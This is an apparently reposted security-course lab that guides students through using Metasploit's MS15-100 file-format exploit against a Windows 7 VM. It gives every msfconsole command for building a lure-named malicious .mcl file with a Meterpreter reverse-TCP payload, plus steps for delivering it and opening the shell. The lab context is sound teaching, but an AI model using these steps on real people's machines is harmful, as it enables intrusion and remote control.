Unit 4: Exploits and Exploiting 4.3 Activity and Discussion Activity: Windows 7 File Exploit

ACTIVITY: WINDOWS 7 FILE EXPLOIT

This activity is ungraded.

• Note: This will only work on a Windows 7 target machine. It will not work on Windows 10.

Software: In this activity you will use these applications and resources that are included in the Kali VM:

• Metasploit
• Meterpreter

Downloads

You’ll need a Windows 7 system. It can be your host machine, or another device altogether. If neither of those conditions are possible, you can download a free legal Windows 7 VM. In your hypervisor, you might need to add the Network Adapter before starting the VM.

• Download Windows 7 VM

Time: This activity should take you approximately 30 minutes to complete.

Goal

• To prepare a malicious file that will create a remote session on a Windows 7 machine when double clicked.

Instructions

Note: Hit Enter after each command.

Before you begin: Make sure that the Windows 7 VM is running in bridged mode (in a separate VMware Hypervisor instance), and is on the same subnet as the Kali box. Turn off the Firewall on the Windows 7 system, and make sure the Windows 7 system and the Kali box can ping each other.

1. Inside of msfconsole, execute the following commands. Make sure you read all output:

• search ms15_100
• use exploit/windows/fileformat/ms15_100_mcl_exe
• info
• set filename secretjonathanvideos.mcl
• set file_name secretjonathanvideos.exe
• set payload windows/meterpreter/reverse_tcp
• set lhost [IP ADDRESS OF YOUR KALI BOX]
• set lport 7777
• exploit

2. Notice the output, indicating the location where this file was created, for example /root/.msf4/local/secretjonathanvideos.mcl.
3. In addition to the file created, a handler was started on the Kali box that will wait for a callback from the target Windows 7 machine when the file is double clicked.
4. Open up another terminal and enter cp /root/.msf4/local/secretjonathanvideos.mcl /root/Desktop. This will copy the file to your Kali desktop.
5. Either using Guest Additions, email, or a USB drive, copy that file over to your Windows 7 machine.
6. Double click the file in the Windows host machine, and click View Now in the security warning.
7. In Kali, you will see a notification that a Meterpreter session has been established.
8. Enter sessions –l to see the sessions listed.
9. Enter sessions –i [number of the session showing in the ID column]. For example: sessions -i 1
10. Enjoy your meterpreter shell! If you're using the free Microsoft Windows 7 VM (which is limited), some Meterpreter commands that I did in the Demo Videos will not work. If you're using your own Windows 7 copy, feel free to replicate everything I did in the demo videos! :-)

After you've finished, complete the activities below. Please be as brief as you can in your responses (five words or less).

转载于:https://www.cnblogs.com/sec875/articles/10028589.html